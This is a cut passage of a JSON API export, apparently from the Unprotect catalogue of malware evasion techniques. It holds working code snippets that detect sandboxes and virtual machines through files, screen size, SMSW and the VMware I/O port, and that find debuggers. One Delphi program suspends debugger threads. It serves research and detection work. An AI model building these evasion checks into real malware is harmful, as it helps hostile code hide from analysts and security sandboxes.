"technique": "https://unprotect.it/api/techniques/35/?format=api",
"description": "",
"plain_code": "#include <iostream>\r\n#include <windows.h>\r\n\r\nint WINAPI WinMain ( HINSTANCE, HINSTANCE, LPSTR, int )\r\n{\r\n char ComputerName [MAX_COMPUTERNAME_LENGTH + 1];\r\n DWORD cbComputerName = sizeof ( ComputerName );\r\n\r\n if ( GetComputerName ( ComputerName, &cbComputerName ))\r\n { \r\n MessageBox ( NULL, ComputerName, \"Computer Name:\", MB_OK | MB_ICONINFORMATION ); \r\n } \r\n}"
},
{
"id": 12,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@securitybreak.io",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/31/?format=api",
"description": "",
"plain_code": "#include \"wtypes.h\"\r\n#include <iostream>\r\nusing namespace std;\r\n\r\n/*\r\n1024x768 can be used for automated Sandbox\r\n800x600 can be used for automated Sandbox\r\n640x480 can be used for automated Sandbox\r\n1024x697\r\n1280x800\r\n1280x960\r\n1680x1050\r\n1916x1066\r\n*/\r\n\r\nvoid GetResolution(int& horiz, int& verti)\r\n{\r\n RECT desktop;\r\n const HWND hDesktop = GetDesktopWindow();\r\n GetWindowRect(hDesktop, &desktop);\r\n horiz = desktop.right;\r\n verti = desktop.bottom;\r\n}\r\n\r\nint main()\r\n{\r\n int horiz = 0;\r\n int verti = 0;\r\n GetResolution(horiz, verti);\r\n\r\n if(horiz < 1024)\r\n {\r\n cout << \"[!] Looks like you run in a sandbox!\"<< '\\n';\r\n }\r\n\r\n cout << \"[+] Screen resolution: \"<< horiz << \"x\" << verti << '\\n';\r\n return 0;\r\n}"
},
{
"id": 10,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@securitybreak.io",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/11/?format=api",
"description": "",
"plain_code": "#include <iostream>\r\n#include <windows.h>\r\n\r\nusing namespace std;\r\n\r\n\r\nBOOL FileExists(TCHAR* szPath)\r\n{\r\n\tDWORD dwAttrib = GetFileAttributes(szPath);\r\n\treturn (dwAttrib != INVALID_FILE_ATTRIBUTES) && !(dwAttrib & FILE_ATTRIBUTE_DIRECTORY);\r\n}\r\n\r\n// Check if file related to sandbox exist\r\nint CheckFile()\r\n{\r\n bool hAppend;\r\n LPSTR fname[] = {\"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\StartUp\\\\agent.pyw\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\vmmouse.sys\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\vmhgfs.sys\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxMouse.sys\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxGuest.sys\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxSF.sys\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\drivers\\\\VBoxVideo.sys\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\vboxdisp.dll\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\vboxhook.dll\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\vboxmrxnp.dll\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\vboxogl.dll\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\vboxoglarrayspu.dll\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\vboxoglcrutil.dll\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\vboxoglerrorspu.dll\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\vboxoglfeedbackspu.dll\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\vboxoglpackspu.dll\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\vboxoglpassthroughspu.dll\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\vboxservice.exe\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\vboxtray.exe\",\r\n \"C:\\\\WINDOWS\\\\system32\\\\VBoxControl.exe\",\r\n // ADD YOUR FILE HERE!\r\n };\r\n\r\n for (int i = 0; i < (sizeof(fname) / sizeof(LPSTR)); i++)\r\n {\r\n\r\n if (FileExists(fname[i]))\r\n cout << \" [+] File exist: \" << (fname[i]) << endl;\r\n\t\telse\r\n cout << \" [-] File doesn't exist: \" << (fname[i]) << endl;\r\n\r\n }\r\n\r\n return 0;\r\n}\r\n\r\n\r\nint main()\r\n{\r\n CheckFile();\r\n return 0;\r\n}"
},
{
"id": 11,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/109/?format=api",
"description": "You can compile this unit as a classic Delphi Console Application. Feel free to edit both `LFindWindowSignatures` and `LProcessNameSignatures` to support more debuggers.",
"plain_code": "program SuspendThread;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n WinAPI.Windows, System.SysUtils, Generics.Collections, tlHelp32, Classes;\r\n\r\ntype\r\n TProcessItem = class\r\n private\r\n FName : String;\r\n FProcessId : Cardinal;\r\n FThreads : TList<Cardinal>;\r\n\r\n {@M}\r\n procedure EnumThreads();\r\n public\r\n {@C}\r\n constructor Create(AName : String; AProcessId : Cardinal; AEnumThreads : Boolean = True);\r\n destructor Destroy(); override;\r\n\r\n {@G}\r\n property Name : String read FName;\r\n property ProcessId : Cardinal read FProcessId;\r\n property Threads : TList<Cardinal> read FThreads;\r\n end;\r\n\r\n TEnumProcess = class\r\n private\r\n FItems : TObjectList<TProcessItem>;\r\n public\r\n {@C}\r\n constructor Create();\r\n destructor Destroy(); override;\r\n\r\n {@M}\r\n function Refresh() : Cardinal;\r\n procedure Clear();\r\n\r\n function Get(AProcessId : Cardinal) : TProcessItem; overload;\r\n function Get(AName : String) : TProcessItem; overload;\r\n\r\n {@G}\r\n property Items : TObjectList<TProcessItem> read FItems;\r\n end;\r\n\r\n{\r\n Import API's From Kernel32\r\n}\r\nconst THREAD_SUSPEND_RESUME = $00000002;\r\n\r\nfunction OpenThread(\r\n dwDesiredAccess: DWORD;\r\n bInheritHandle: BOOL;\r\n dwThreadId: DWORD\r\n ) : THandle; stdcall; external kernel32 name 'OpenThread';\r\n\r\n{\r\n Global Vars\r\n}\r\nvar LFindWindowSignatures : TDictionary<String, String>;\r\n LProcessNameSignatures : TStringList;\r\n LProcesses : TEnumProcess;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n Process Item (Process Name / Process Id / Process Main Thread Id)\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\n{-------------------------------------------------------------------------------\r\n ___constructor\r\n-------------------------------------------------------------------------------}\r\nconstructor TProcessItem.Create(AName : String; AProcessId : Cardinal; AEnumThreads : Boolean = True);\r\nbegin\r\n FName := AName;\r\n FProcessId := AProcessId;\r\n\r\n FThreads := TList<Cardinal>.Create();\r\n\r\n if AEnumThreads then\r\n self.EnumThreads();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n ___destructor\r\n-------------------------------------------------------------------------------}\r\ndestructor TProcessItem.Destroy();\r\nbegin\r\n if Assigned(FThreads) then\r\n FreeAndNil(FThreads);\r\n\r\n ///\r\n inherited Destroy();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n Enumerate Threads of process object\r\n-------------------------------------------------------------------------------}\r\nprocedure TProcessItem.EnumThreads();\r\nvar ASnap : THandle;\r\n AThreadEntry : TThreadEntry32;\r\n\r\n procedure InitializeItem();\r\n begin\r\n ZeroMemory(@AThreadEntry, SizeOf(TThreadEntry32));\r\n\r\n AThreadEntry.dwSize := SizeOf(TThreadEntry32);\r\n end;\r\n\r\n procedure AppendItem();\r\n begin\r\n if (AThreadEntry.th32OwnerProcessID <> FProcessId) then\r\n Exit();\r\n ///\r\n\r\n FThreads.Add(AThreadEntry.th32ThreadID);\r\n end;\r\nbegin\r\n if NOT Assigned(FThreads) then\r\n Exit();\r\n ///\r\n\r\n FThreads.Clear();\r\n ///\r\n\r\n ASnap := CreateToolHelp32Snapshot(TH32CS_SNAPTHREAD, 0);\r\n if (ASnap = INVALID_HANDLE_VALUE) then\r\n Exit();\r\n try\r\n InitializeItem();\r\n\r\n if NOT Thread32First(ASnap, AThreadEntry) then\r\n Exit();\r\n\r\n AppendItem();\r\n\r\n while True do begin\r\n InitializeItem();\r\n\r\n if NOT Thread32Next(ASnap, AThreadEntry) then\r\n break;\r\n\r\n AppendItem();\r\n end;\r\n finally\r\n CloseHandle(ASnap);\r\n end;\r\nend;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n Enumerate Process Class\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\n{-------------------------------------------------------------------------------\r\n ___constructor\r\n-------------------------------------------------------------------------------}\r\nconstructor TEnumProcess.Create();\r\nbegin\r\n FItems := TObjectList<TProcessItem>.Create();\r\n FItems.OwnsObjects := True;\r\n\r\n ///\r\n self.Refresh();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n ___destructor\r\n-------------------------------------------------------------------------------}\r\ndestructor TEnumProcess.Destroy();\r\nbegin\r\n if Assigned(FItems) then\r\n FreeAndNil(FItems);\r\n\r\n ///\r\n inherited Destroy();\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n Enumerate Running Process.\r\n @Return: Process Count\r\n-------------------------------------------------------------------------------}\r\nfunction TEnumProcess.Refresh() : Cardinal;\r\nvar ASnap : THandle;\r\n AProcessEntry : TProcessEntry32;\r\n\r\n procedure InitializeItem();\r\n begin\r\n ZeroMemory(@AProcessEntry, SizeOf(TProcessEntry32));\r\n\r\n AProcessEntry.dwSize := SizeOf(TProcessEntry32);\r\n end;\r\n\r\n procedure AppendItem();\r\n var AItem : TProcessItem;\r\n begin\r\n AItem := TProcessItem.Create(\r\n AProcessEntry.szExeFile,\r\n AProcessEntry.th32ProcessID,\r\n True {Enum Threads: Default}\r\n );\r\n\r\n FItems.Add(AItem);\r\n end;\r\n\r\nbegin\r\n result := 0;\r\n ///\r\n\r\n if NOT Assigned(FItems) then\r\n Exit();\r\n ///\r\n\r\n self.Clear();\r\n\r\n ASnap := CreateToolHelp32Snapshot(TH32CS_SNAPPROCESS, 0);\r\n if (ASnap = INVALID_HANDLE_VALUE) then\r\n Exit();\r\n try\r\n InitializeItem();\r\n\r\n if NOT Process32First(ASnap, AProcessEntry) then\r\n Exit();\r\n\r\n AppendItem();\r\n\r\n while True do begin\r\n InitializeItem();\r\n\r\n if NOT Process32Next(ASnap, AProcessEntry) then\r\n break;\r\n\r\n AppendItem();\r\n end;\r\n finally\r\n CloseHandle(ASnap);\r\n end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n Clear Items (Process Objects)\r\n-------------------------------------------------------------------------------}\r\nprocedure TEnumProcess.Clear();\r\nbegin\r\n if Assigned(FItems) then\r\n FItems.Clear;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n Get Process Item by Process Id or Name\r\n-------------------------------------------------------------------------------}\r\nfunction TEnumProcess.Get(AProcessId : Cardinal) : TProcessItem;\r\nvar AItem : TProcessItem;\r\n I : Integer;\r\nbegin\r\n result := nil;\r\n ///\r\n\r\n for I := 0 to self.Items.count -1 do begin\r\n AItem := self.Items.Items[I];\r\n if NOT Assigned(AItem) then\r\n continue;\r\n ///\r\n\r\n if (AItem.ProcessId = AProcessId) then begin\r\n result := AItem;\r\n\r\n Break;\r\n end;\r\n end;\r\nend;\r\n\r\nfunction TEnumProcess.Get(AName : String) : TProcessItem;\r\nvar AItem : TProcessItem;\r\n I : Integer;\r\nbegin\r\n result := nil;\r\n ///\r\n\r\n for I := 0 to self.Items.count -1 do begin\r\n AItem := self.Items.Items[I];\r\n if NOT Assigned(AItem) then\r\n continue;\r\n ///\r\n\r\n if (AItem.Name.ToLower = AName.ToLower) then begin\r\n result := AItem;\r\n\r\n Break;\r\n end;\r\n end;\r\nend;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n Main\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\n{-------------------------------------------------------------------------------\r\n Suspend Threads of target process.\r\n-------------------------------------------------------------------------------}\r\nfunction SuspendThreadsByProcessId(AProcessId : Cardinal) : Boolean;\r\nvar AItem : TProcessItem;\r\n AThreadId : Cardinal;\r\n I : Integer;\r\n AThread : THandle;\r\nbegin\r\n result := False;\r\n ///\r\n\r\n if NOT Assigned(LProcesses) then\r\n Exit();\r\n\r\n AItem := LProcesses.Get(AProcessId);\r\n if NOT Assigned(AItem) then\r\n Exit();\r\n ///\r\n\r\n if (AItem.Threads.count = 0) then\r\n Exit();\r\n ///\r\n\r\n for I := 0 to AItem.Threads.Count -1 do begin\r\n AThreadId := AItem.Threads.Items[I];\r\n ///\r\n\r\n AThread := OpenThread(THREAD_SUSPEND_RESUME, False, AThreadId);\r\n if (AThread = 0) then\r\n continue;\r\n try\r\n WriteLn(Format('Suspending: %s(%d), Thread Id: %d...', [\r\n AItem.Name,\r\n AItem.ProcessId,\r\n AThreadId\r\n ]));\r\n\r\n WinAPI.Windows.SuspendThread(AThread);\r\n\r\n result := True;\r\n finally\r\n CloseHandle(AThread);\r\n end;\r\n end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n FindWindow API Example\r\n-------------------------------------------------------------------------------}\r\nfunction method_FindWindow() : Boolean;\r\nvar AHandle : THandle;\r\n AProcessId : Cardinal;\r\n AClassName : String;\r\n AWindowName : String;\r\n pClassName : Pointer;\r\n pWindowName : Pointer;\r\nbegin\r\n result := False;\r\n ///\r\n\r\n for AClassName in LFindWindowSignatures.Keys do begin\r\n if NOT LFindWindowSignatures.TryGetValue(AClassName, AWindowName) then\r\n continue;\r\n ///\r\n\r\n pClassName := nil;\r\n pWindowName := nil;\r\n\r\n if NOT AClassName.isEmpty then\r\n pClassName := PWideChar(AClassName);\r\n\r\n if NOT AWindowName.isEmpty then\r\n pWindowName := PWideChar(AWindowName);\r\n\r\n AHandle := FindWindowW(pClassName, pWindowName);\r\n if (AHandle > 0) then begin\r\n GetWindowThreadProcessId(AHandle, @AProcessId);\r\n if (AProcessId > 0) then\r\n SuspendThreadsByProcessId(AProcessId);\r\n\r\n ///\r\n result := True;\r\n end;\r\n end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n Find Process Example (Uses the TEnumProcess Class) - See above\r\n-------------------------------------------------------------------------------}\r\nfunction method_FindProcess() : Boolean;\r\nvar AItem : TProcessItem;\r\n AName : String;\r\n I : Integer;\r\nbegin\r\n result := False;\r\n ///\r\n\r\n for I := 0 to LProcessNameSignatures.count -1 do begin\r\n AName := LProcessNameSignatures.Strings[I];\r\n\r\n AItem := LProcesses.Get(AName);\r\n if (NOT Assigned(AItem)) then\r\n continue;\r\n ///\r\n\r\n SuspendThreadsByProcessId(AItem.ProcessId);\r\n\r\n ///\r\n result := True;\r\n end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n ___entry\r\n-------------------------------------------------------------------------------}\r\nbegin\r\n try\r\n LProcesses := TEnumProcess.Create();\r\n try\r\n // FindWindow API\r\n LFindWindowSignatures := TDictionary<String, String>.Create();\r\n try\r\n {\r\n ...\r\n\r\n @Param1: ClassName (Empty = NULL)\r\n @Param2: WindowName (Empty = NULL)\r\n\r\n Add your own signatures bellow...\r\n }\r\n LFindWindowSignatures.Add('OLLYDBG', '');\r\n {\r\n ...\r\n }\r\n method_FindWindow();\r\n finally\r\n if Assigned(LFindWindowSignatures) then\r\n FreeAndNil(LFindWindowSignatures);\r\n end;\r\n\r\n // Find by Process Name\r\n LProcessNameSignatures := TStringList.Create();\r\n try\r\n {\r\n ...\r\n\r\n @Param1: Process Name (Example: OllyDbg.exe) - Case Insensitive\r\n\r\n Add your own signatures bellow...\r\n }\r\n LProcessNameSignatures.Add('ImmunityDebugger.exe');\r\n {\r\n ...\r\n }\r\n method_FindProcess();\r\n finally\r\n if Assigned(LProcessNameSignatures) then\r\n FreeAndNil(LProcessNameSignatures);\r\n end;\r\n finally\r\n if Assigned(LProcesses) then\r\n FreeAndNil(LProcesses);\r\n end;\r\n except\r\n on E: Exception do\r\n Writeln(E.ClassName, ': ', E.Message);\r\n end;\r\nend."
},
{
"id": 9,
"language": {
"id": 1,
"label": "Delphi",
"code_class": "Delphi"
},
"user": {
"id": 4,
"username": "DarkCoderSc",
"email": "jplesueur@proton.me",
"linkedin": "https://www.linkedin.com/in/jlesueur/",
"twitter": "https://www.twitter.com/darkcodersc",
"website": "https://www.phrozen.io/",
"github": "https://github.com/DarkCoderSc"
},
"technique": "https://unprotect.it/api/techniques/67/?format=api",
"description": "You can build this snippet as a classic Delphi Console Application and add your own signatures for detecting debuggers and related tools.",
"plain_code": "program FindWindowAPI;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\nuses\r\n System.SysUtils, WinAPI.Windows, Generics.Collections, psAPI;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n TFindWindowSignature Class\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\ntype\r\n TFindWindowSignature = class\r\n private\r\n FDescription : String;\r\n FClassName : String;\r\n FWindowName : String;\r\n public\r\n {@C}\r\n constructor Create(ADescription, AClassName, AWindowName : String);\r\n\r\n {@G}\r\n property Description : String read FDescription;\r\n property ClassName : String read FClassName;\r\n property WindowName : String read FWindowName;\r\n end;\r\n\r\n{-------------------------------------------------------------------------------\r\n ___constructor\r\n-------------------------------------------------------------------------------}\r\nconstructor TFindWindowSignature.Create(ADescription, AClassName, AWindowName : String);\r\nbegin\r\n FDescription := ADescription;\r\n FClassName := AClassName;\r\n FWindowName := AWindowName;\r\nend;\r\n\r\n{+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\r\n Main\r\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++}\r\n\r\nvar LFindWindowSignatures : TObjectList<TFindWindowSignature>;\r\n LEnumWindowsSignatures : TDictionary<String, String>;\r\n\r\n{-------------------------------------------------------------------------------\r\n When a Window handle is found it will output to console several information\r\n about spotted process.\r\n-------------------------------------------------------------------------------}\r\nprocedure Found(ADescription : String; AHandle : THandle);\r\nconst CRLF = #13#10;\r\n\r\nvar AStdout_TXT : String;\r\n AProcessId : Cardinal;\r\n AProcessHandle : THandle;\r\n ARet : DWORD;\r\n pImagePath : PWideChar;\r\nbegin\r\n try\r\n AStdout_TXT := AStdout_TXT + StringOfChar('-', 60) + CRLF;\r\n AStdout_TXT := AStdout_TXT + ADescription + CRLF;\r\n AStdout_TXT := AStdout_TXT + StringOfChar('-', 60) + CRLF;\r\n\r\n AStdout_TXT := AStdout_TXT + Format('Handle: %d%s', [AHandle, CRLF]);\r\n\r\n GetWindowThreadProcessId(AHandle, @AProcessId);\r\n\r\n if (AProcessId > 0) then begin\r\n AProcessHandle := OpenProcess(\r\n (PROCESS_QUERY_INFORMATION or PROCESS_VM_READ),\r\n False,\r\n AProcessId\r\n );\r\n\r\n if (AProcessHandle > 0) then begin\r\n AStdout_TXT := AStdout_TXT + Format('Process Id: %d%s', [AProcessId, CRLF]);\r\n\r\n pImagePath := nil;\r\n try\r\n GetMem(pImagePath, (MAX_PATH * 2));\r\n ARet := GetModuleFileNameExW(AProcessHandle, 0, pImagePath, (MAX_PATH * 2));\r\n if (ARet > 0) then begin\r\n AStdout_TXT := AStdout_TXT + Format('Process Name: %s%s', [ExtractFileName(String(pImagePath)), CRLF]);\r\n AStdout_TXT := AStdout_TXT + Format('Image Path: %s%s', [ExtractFilePath(String(pImagePath)), CRLF]);\r\n end;\r\n finally\r\n if Assigned(pImagePath) and (ARet > 0) then\r\n FreeMem(pImagePath, ARet);\r\n end;\r\n end;\r\n end;\r\n\r\n AStdout_TXT := AStdout_TXT + StringOfChar('-', 60) + CRLF + CRLF;\r\n\r\n ///\r\n finally\r\n WriteLn(AStdout_TXT);\r\n end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n Find Debuggers by Window Name or Class Name using FindWindow API\r\n-------------------------------------------------------------------------------}\r\nfunction Locate_FindWindow() : Boolean;\r\nvar AFindWindowSignature : TFindWindowSignature;\r\n i : Integer;\r\n pClassName : Pointer;\r\n pWindowName : Pointer;\r\n AHandle : THandle;\r\nbegin\r\n result := False;\r\n ///\r\n\r\n for i := 0 to LFindWindowSignatures.Count -1 do begin\r\n AFindWindowSignature := LFindWindowSignatures.Items[i];\r\n if NOT Assigned(AFindWindowSignature) then\r\n continue;\r\n ///\r\n\r\n pClassName := nil;\r\n pWindowName := nil;\r\n\r\n if NOT AFindWindowSignature.ClassName.isEmpty then\r\n pClassName := PWideChar(AFindWindowSignature.ClassName);\r\n\r\n if NOT AFindWindowSignature.WIndowName.isEmpty then\r\n pWindowName := PWideChar(AFindWindowSignature.WindowName);\r\n\r\n AHandle := FindWindowW(pClassName, pWindowName);\r\n if (AHandle > 0) then begin\r\n Found(AFindWindowSignature.Description, AHandle);\r\n\r\n ///\r\n result := True;\r\n end;\r\n end;\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n Find Debuggers by Window Name (via Window Name Pattern) using EnumWindows API\r\n-------------------------------------------------------------------------------}\r\nfunction EnumWindowProc(AHandle : THandle; AParam : LPARAM) : BOOL; stdcall;\r\nvar AMaxCount : Integer;\r\n AWindowName : String;\r\n AOldLen : Cardinal;\r\n APattern : String;\r\n AKey : String;\r\nbegin\r\n result := True;\r\n ///\r\n\r\n if (AHandle = 0) then\r\n Exit();\r\n ///\r\n\r\n AMaxCount := GetWindowTextLength(AHandle) + 1;\r\n if (AMaxCount = 0) then\r\n Exit();\r\n\r\n SetLength(AWindowName, AMaxCount); // Other technique instead of using GetMem / FreeMem a new Pointer.\r\n try\r\n if (GetWindowTextW(AHandle, PWideChar(AWindowName), AMaxCount) = 0) then\r\n Exit();\r\n ///\r\n\r\n AOldLen := Length(AWindowName);\r\n\r\n for AKey {Description} in LEnumWindowsSignatures.keys do begin\r\n if NOT LEnumWindowsSignatures.TryGetValue(AKey, APattern) then\r\n continue;\r\n\r\n AWindowName := StringReplace(AWindowName, APattern, '', []);\r\n\r\n if (Length(AWindowName) <> AOldLen) then begin\r\n Found(AKey, AHandle);\r\n\r\n break;\r\n end;\r\n end;\r\n finally\r\n SetLength(AWindowName, 0);\r\n end;\r\nend;\r\n\r\nfunction Locate_EnumWindows() : Boolean;\r\nbegin\r\n EnumWindows(@EnumWindowProc, 0);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n Append FindWindow Technique Signature\r\n-------------------------------------------------------------------------------}\r\nprocedure AppendFindWindowSignature(ADescription, AClassName, AWindowName : String);\r\nvar AFindWindowSignature : TFindWindowSignature;\r\nbegin\r\n if NOT Assigned(LFindWindowSignatures) then\r\n Exit();\r\n ///\r\n\r\n AFindWindowSignature := TFindWindowSignature.Create(ADescription, AClassName, AWindowName);\r\n\r\n LFindWindowSignatures.Add(AFindWindowSignature);\r\nend;\r\n\r\n{-------------------------------------------------------------------------------\r\n ___entry\r\n-------------------------------------------------------------------------------}\r\nbegin\r\n try\r\n LFindWindowSignatures := TObjectList<TFindWindowSignature>.Create();\r\n LEnumWindowsSignatures := TDictionary<String, String>.Create();\r\n try\r\n {\r\n Configure debuggers signatures here for FindWindow API technique.\r\n }\r\n AppendFindWindowSignature('OllyDbg', 'OLLYDBG', '');\r\n AppendFindWindowSignature('x64dbg (x64)', '', 'x64dbg');\r\n AppendFindWindowSignature('x32dbg (x32)', '', 'x32dbg');\r\n\r\n // ...\r\n // AppendFindWindowSignature('...', '...', '...');\r\n // ...\r\n\r\n {\r\n Configure debuggeers signatures here for EnumWindows API technique.\r\n }\r\n LEnumWindowsSignatures.Add('Immunity Debugger', 'Immunity Debugger');\r\n\r\n // ...\r\n // AEnumWindowsSignatures.Add('...', '...');\r\n // ...\r\n\r\n {\r\n Fire !!!\r\n }\r\n Locate_FindWindow();\r\n Locate_EnumWindows();\r\n\r\n readln;\r\n finally\r\n if Assigned(LFindWindowSignatures) then\r\n FreeAndNil(LFindWindowSignatures);\r\n\r\n if Assigned(LEnumWindowsSignatures) then\r\n FreeAndNil(LEnumWindowsSignatures);\r\n end;\r\n except\r\n on E: Exception do\r\n Writeln(E.ClassName, ': ', E.Message);\r\n end;\r\n\r\nend."
},
{
"id": 7,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@securitybreak.io",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/19/?format=api",
"description": "",
"plain_code": "#include <iostream>\r\n\r\nusing namespace std;\r\n\r\nvoid smsw()\r\n{\r\n\tunsigned int reax = 0;\r\n\r\n\t__asm\r\n\t{\r\n\t\tmov eax, 0xCCCCCCCC\r\n\t\tsmsw eax\r\n\t\tmov DWORD PTR[reax], eax\r\n\t}\r\n\r\n\tif ((((reax >> 24) & 0xFF) == 0xcc) && (((reax >> 16) & 0xFF) == 0xcc))\r\n\t{\r\n\t cout << \"VM detected!\" << endl;\r\n\t}\r\n}\r\n\r\nint main()\r\n{\r\n smsw();\r\n cout << \"Hello world!\" << endl;\r\n return 0;\r\n}"
},
{
"id": 8,
"language": {
"id": 2,
"label": "C++",
"code_class": "cpp"
},
"user": {
"id": 6,
"username": "Unprotect",
"email": "null@localhost",
"linkedin": null,
"twitter": "https://twitter.com/hashtag/unprotectproject",
"website": null,
"github": null
},
"technique": "https://unprotect.it/api/techniques/7/?format=api",
"description": "Source: https://gist.github.com/kooroshh/e4a303368555ea57f04f87e5630147b5",
"plain_code": "void CheckVM(void)\r\n{\r\n\tunsigned int a, b;\r\n\r\n\t__try {\r\n\t\t__asm {\r\n\r\n\t\t\t// save register values on the stack\r\n\t\t\tpush eax\r\n\t\t\tpush ebx\r\n\t\t\tpush ecx\r\n\t\t\tpush edx\r\n\r\n\t\t\t// perform fingerprint\r\n\t\t\tmov eax, 'VMXh' // VMware magic value (0x564D5868)\r\n\t\t\tmov ecx, 0Ah // special version cmd (0x0a)\r\n\t\t\tmov dx, 'VX' // special VMware I/O port (0x5658)\r\n\r\n\t\t\tin eax, dx // special I/O cmd\r\n\r\n\t\t\tmov a, ebx // data \r\n\t\t\tmov b, ecx // data (eax gets also modified\r\n\r\n\t\t\t// restore register values from the stack\r\n\t\t\tpop edx\r\n\t\t\tpop ecx\r\n\t\t\tpop ebx\r\n\t\t\tpop eax\r\n\t\t}\r\n\t}\r\n\t__except (EXCEPTION_EXECUTE_HANDLER) {}\r\n\r\n\tif (a == 'VMXh') { // is the value equal to the VMware magic value?\r\n\t\tprintf(\"Result : VMware detected\\nVersion : \");\r\n\t\tif (b == 1)\r\n\t\t\tprintf(\"Express\\n\\n\");\r\n\t\telse if (b == 2)\r\n\t\t\tprintf(\"ESX\\n\\n\");\r\n\t\telse if (b == 3)\r\n\t\t\tprintf(\"GSX\\n\\n\");\r\n\t\telse if (b == 4)\r\n\t\t\tprintf(\"Workstation\\n\\n\");\r\n\t\telse\r\n\t\t\tprintf(\"unknown version\\n\\n\");\r\n\t}\r\n\telse\r\n\t\tprintf(\"Result : Not Detected\\n\\n\");\r\n}"
},
{
"id": 6,
"language": {
"id": 3,
"label": "Python",
"code_class": "python"
},
"user": {
"id": 5,
"username": "fr0gger",
"email": "thomas.roccia@securitybreak.io",
"linkedin": "https://www.linkedin.com/in/thomas-roccia",
"twitter": "https://twitter.com/fr0gger_",
"website": "https://securitybreak.io",
"github": "https://github.com/fr0gger"
},
"technique": "https://unprotect.it/api/techniques/34/?format=api",
"description": "Python snippet to detect the drive size with `GetDiskFreeSpaceExW`",
